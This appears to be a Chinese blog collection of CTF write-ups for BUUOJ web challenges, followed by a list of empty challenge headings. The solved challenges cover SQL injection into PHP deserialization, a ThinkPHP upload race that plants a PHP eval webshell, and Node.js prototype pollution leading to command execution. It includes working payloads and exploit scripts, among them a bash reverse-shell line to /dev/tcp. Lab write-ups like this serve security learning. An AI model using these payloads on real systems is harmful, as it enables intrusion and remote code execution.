  $con = mysqli_connect("127.0.0.1","root","root","pic_base");
  if (mysqli_connect_errno($con)) 
  { 
    die("Connect MySQL Fail:".mysqli_connect_error());
  }
  $sql_fields = array();
  $sql_val = array();
  foreach($data as $key=>$value){
    $key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $key);
    $value_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $value);
    $sql_fields[] = "`".$key_temp."`";
    $sql_val[] = "'".$value_temp."'";
  }
  $sql = "INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")";
  mysqli_query($con, $sql);
  $id = mysqli_insert_id($con);
  mysqli_close($con);
  return $id;
}

用到的方法为

"INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")"

向上查看

跟进到 upload 函数。

找到对应的列名

		$array = array();
		$array["title"] = $fileinfo['title'];
		$array["filename"] = $fileinfo['filename'];
		$array["ext"] = $fileinfo['ext'];
		$array["path"] = $fileinfo['path'];
		$img_ext = getimagesize($_FILES[$input]["tmp_name"]);
		$my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);
		$array["attr"] = serialize($my_ext);
		$id = $this->save($array);

整合下来
insert into images (`title`,`filename`,`ext`,`path`,`attr`) values ('a','b','c','d','e')

我们传入的是 attr 属性保存的值就是序列化后的

说明这里确实存在反序列化利用。

因为我们要查看的是 /flag 的内容

所以 payload

<?php
class helper {
	protected $config = "/flag";
	protected $ifview = 1;
}

$a = new helper;
echo str_replace(chr(0).'*'.chr(0), '\0\0\0', serialize($a));
# O:6:"helper":2:{s:9:"\0\0\0config";s:5:"/flag";s:9:"\0\0\0ifview";i:1;}

因为属性为 protected

且替换了里面的 \x00 为 \0

		foreach($data as $key=>$value){
			$key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $key);
			$value_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $value);
			$sql_fields[] = "`".$key_temp."`";
			$sql_val[] = "'".$value_temp."'";
		}
"INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")"

所以最后我们生成的反序列化

我们得到了反序列化的函数。

所以我们要构造对应的sql

因为 $sql_valu 是在前面和后面加了单引号

有根据 check 函数发现我们能够控制的只有 $titile

所以我们可以利用这个点来布置好对应的 sql 语句。从而将attr 赋值为序列化。

不能有单引号等，所以我们序列化话转 16进制。

最后的 payload

修改 filename

a','b','c','d',0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b733a393a225c305c305c30696676696577223b693a313b7d)#.png

上传成功

点击查看

得到 flag

[RoarCTF 2019]Simple Upload

2021.1.3

考点

Thinkphp 文件上传存在条件竞争

做题步骤

ThinkPHP默认上传文件名是递增的。代码中ThinkPHP的后缀过滤无效，所以通过上传多个文件的方式，绕过.php后缀的判断，但是这样拿不到上传的文件名，需要爆破。

<?php
namespace Home\Controller;

use Think\Controller;

class IndexController extends Controller
{
    public function index()
    {
        show_source(__FILE__);
    }
    public function upload()
    {
        $uploadFile = $_FILES['file'] ;
        
        if (strstr(strtolower($uploadFile['name']), ".php") ) {
            return false;
        }
        
        $upload = new \Think\Upload();// 实例化上传类
        $upload->maxSize  = 4096 ;// 设置附件上传大小
        $upload->allowExts  = array('jpg', 'gif', 'png', 'jpeg');// 设置附件上传类型
        $upload->rootPath = './Public/Uploads/';// 设置附件上传目录
        $upload->savePath = '';// 设置附件上传子目录
        $info = $upload->upload() ;
        if(!$info) {// 上传错误提示错误信息
          $this->error($upload->getError());
          return;
        }else{// 上传成功 获取上传文件信息
          $url = __ROOT__.substr($upload->rootPath,1).$info['file']['savepath'].$info['file']['savename'] ;
          echo json_encode(array("url"=>$url,"success"=>1));
        }
    }
}

于是利用脚本上传。

import requests
url = "http://e57ee3be-80a4-4469-9e61-949064200371.node3.buuoj.cn//index.php/Home/Index/upload"

files1 = {'file': open('shell.txt','r')}
files2 = {'file[]': open('shell.php','r')}

r = requests.post(url,files=files1)
print(r.text)

r = requests.post(url,files=files2)
print(r.text)

r = requests.post(url,files=files1)
print(r.text)

然后去查看对应文件夹的文件名。

然后爆破得到那个文件名

就能得到 flag

后面发现我的脚本那个发包很慢

看了wp找到一个一次发两个文件的条件竞争，这样我们的文件名差距就很小

#coding:utf-8
import requests
import time
import json

url = "http://e57ee3be-80a4-4469-9e61-949064200371.node3.buuoj.cn/"

path = url + "/index.php/home/index/upload"
files = {"file":("a.txt",'a'), "file1":("b.php", '<?php eval($_GET["a"]);')}
r = requests.post(path, files=files)
t1 = r.text.split("/")[-1].split(".")[0]
param=json.loads(r.content)
print param
t1 = int(t1, 16)

j = t1
while True:
    path = url + "/Public/Uploads/"+param['url'].split("/")[-2]+"/%s.php" % hex(j)[2:]
    try:
        r = requests.get(path,timeout=1)
    except:
        continue
    if r.status_code == 429:#规避过于频繁访问导致的429
        time.sleep(0.1)
        continue
    elif r.status_code != 404:
        print path
        print r.text
        break
    print j, path, r.status_code
    j -= 1

[GXYCTF2019]StrongestMind

2021.1.4

考点

脚本编写

做题步骤

计算答案

成功 1000 次

import requests
import re
import time
url = "http://fad21fd0-8a5c-48fd-907e-8896402bfbac.node3.buuoj.cn/"
requests = requests.session()
res = requests.get(url)
res.encoding="utf-8"
print(res.text)
p = re.findall(r"\d+.[+|-].\d+",res.text)
a = eval(p[0])
res = requests.post(url,data={"answer":a})
for i in range(1000):
    p = re.findall(r"\d+.[+|-].\d+",res.text)   
    a = eval(p[0])
    print(i,a)
    res = requests.post(url,data={"answer":a})
    time.sleep(0.1)
print(res.text)

[GYCTF2020]Ez_Express

2021.1.4

考点

Nodejs

Node.js 常见漏洞学习与总结

原型链污染

做题步骤

在我们调用一个对象的某属性时：

1
2
3

1.对象(obj)中寻找这一属性
2.如果找不到，则在obj.__proto__中寻找属性
3.如果仍然找不到，则继续在obj.__proto__.__proto__中寻找这一属性

以上机制被称为js的prototype继承链。而原型链污染就与这有关

原型链污染定义：

1	如果攻击者控制并修改了一个对象的原型，那么将可以影响所有和这个对象来自同一个类、父祖类的对象。这种攻击方式就是原型链污染

然后注册的时候

没有思路，扫下目录

发现有一个 www.zip 的目录文件

审计代码

发现 index.esj 中

有hint

说明有个 /flag

然后查看 index.js

var express = require('express');
var router = express.Router();
const isObject = obj => obj && obj.constructor && obj.constructor === Object;
const merge = (a, b) => {
  for (var attr in b) {
    if (isObject(a[attr]) && isObject(b[attr])) {
      merge(a[attr], b[attr]);
    } else {
      a[attr] = b[attr];
    }
  }
  return a
}
const clone = (a) => {
  return merge({}, a);
}
function safeKeyword(keyword) {
  if(keyword.match(/(admin)/is)) {
      return keyword
  }

  return undefined
}

router.get('/', function (req, res) {
  if(!req.session.user){
    res.redirect('/login');
  }
  res.outputFunctionName=undefined;
  res.render('index',data={'user':req.session.user.user});
});


router.get('/login', function (req, res) {
  res.render('login');
});



router.post('/login', function (req, res) {
  if(req.body.Submit=="register"){
   if(safeKeyword(req.body.userid)){
    res.end("<script>alert('forbid word');history.go(-1);</script>") 
   }
    req.session.user={
      'user':req.body.userid.toUpperCase(),
      'passwd': req.body.pwd,
      'isLogin':false
    }
    res.redirect('/'); 
  }
  else if(req.body.Submit=="login"){
    if(!req.session.user){res.end("<script>alert('register first');history.go(-1);</script>")}
    if(req.session.user.user==req.body.userid&&req.body.pwd==req.session.user.passwd){
      req.session.user.isLogin=true;
    }
    else{
      res.end("<script>alert('error passwd');history.go(-1);</script>")
    }
  
  }
  res.redirect('/'); ;
});
router.post('/action', function (req, res) {
  if(req.session.user.user!="ADMIN"){res.end("<script>alert('ADMIN is asked');history.go(-1);</script>")} 
  req.session.user.data = clone(req.body);
  res.end("<script>alert('success');history.go(-1);</script>");  
});
router.get('/info', function (req, res) {
  res.render('index',data={'user':res.outputFunctionName});
})
module.exports = router;

发现其中的注册

会判断是不是 admin

function safeKeyword(keyword) {
  if(keyword.match(/(admin)/is)) {
      return keyword
  }
  return undefined
}

后面知道

p牛的

https://www.leavesongs.com/HTML/javascript-up-low-ercase-tip.html

可以绕过

toUpperCase()是javascript中将小写转换成大写的函数。toLowerCase()是javascript中将大写转换成小写的函数。

我们这里

注册的时候有个 rep.body.userid.toUpperCase()

所以利用

字符"ı"、"ſ" 经过toUpperCase处理后结果为 "I"、"S"

来绕过从而实现注册和登录

账号 admın 密码随意。

成功创建，然后重新返回更目录

点击提交会进入 /action 路由。

router.post('/action', function (req, res) {
  if(req.session.user.user!="ADMIN"){res.end("<script>alert('ADMIN is asked');history.go(-1);</script>")} 
  req.session.user.data = clone(req.body);
  res.end("<script>alert('success');history.go(-1);</script>");  
});

其中有一个 clone 函数这是nodejs 原型污染经常用到的

const merge = (a, b) => {
  for (var attr in b) {
    if (isObject(a[attr]) && isObject(b[attr])) {
      merge(a[attr], b[attr]);
    } else {
      a[attr] = b[attr];
    }
  }
  return a
}
const clone = (a) => {
  return merge({}, a);
}

这里可以存在原型链污染，然后在 /info 中

1
2
3

router.get('/info', function (req, res) {
  res.render('index',data={'user':res.outputFunctionName});
})

这里的 outputFunctionName 赋值给 user

在前端会被渲染。

然后学习下 js 原型链污染 rce

https://xz.aliyun.com/t/7075#toc-3

利用payload

需要 Content-Type改成application/json

// 回显字符串
{"lua":"a","__proto__":{"outputFunctionName":"t=1;return global.process.mainModule.constructor._load('child_process').execSync('cat /flag').toString()//"},"Submit":""}
// 弹shell
{"__proto__":{"outputFunctionName":"a=1;global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/IP/port 0>&1\"')//"}}

这样我们已经实现了原型链污染。

然后要做的就是访问 /info 路由这样就能下载flag文件

[SWPUCTF 2018]SimplePHP

考点

做题步骤

[RoarCTF 2019]Online Proxy

考点

做题步骤

[HarekazeCTF2019]encode_and_encode

考点

做题步骤

[BJDCTF2020]EzPHP

考点

做题步骤

[NCTF2019]SQLi

考点

做题步骤

[网鼎杯 2020 白虎组]PicDown

考点

做题步骤

[WUSTCTF2020]CV Maker

考点

做题步骤

[HFCTF2020]JustEscape

考点

做题步骤

[GYCTF2020]EasyThinking

考点

做题步骤

[强网杯 2019]Upload

考点

做题步骤

[b01lers2020]Welcome to Earth

考点

做题步骤

[网鼎杯2018]Unfinish

考点

做题步骤

[watevrCTF-2019]Cookie Store

考点

做题步骤

[CISCN2019 华东南赛区]Double Secret

考点

做题步骤

bestphp’s revenge

考点

做题步骤

[SCTF2019]Flag Shop

考点

做题步骤

[RootersCTF2019]I_<3_Flask

考点

做题步骤

[GYCTF2020]Easyphp

考点

做题步骤

[NPUCTF2020]ezinclude

考点

做题步骤

[安洵杯 2019]不是文件上传

考点

做题步骤

[RoarCTF 2019]Simple Upload

考点

做题步骤

[GXYCTF2019]StrongestMind

考点

做题步骤

[GYCTF2020]Ez_Express

考点

做题步骤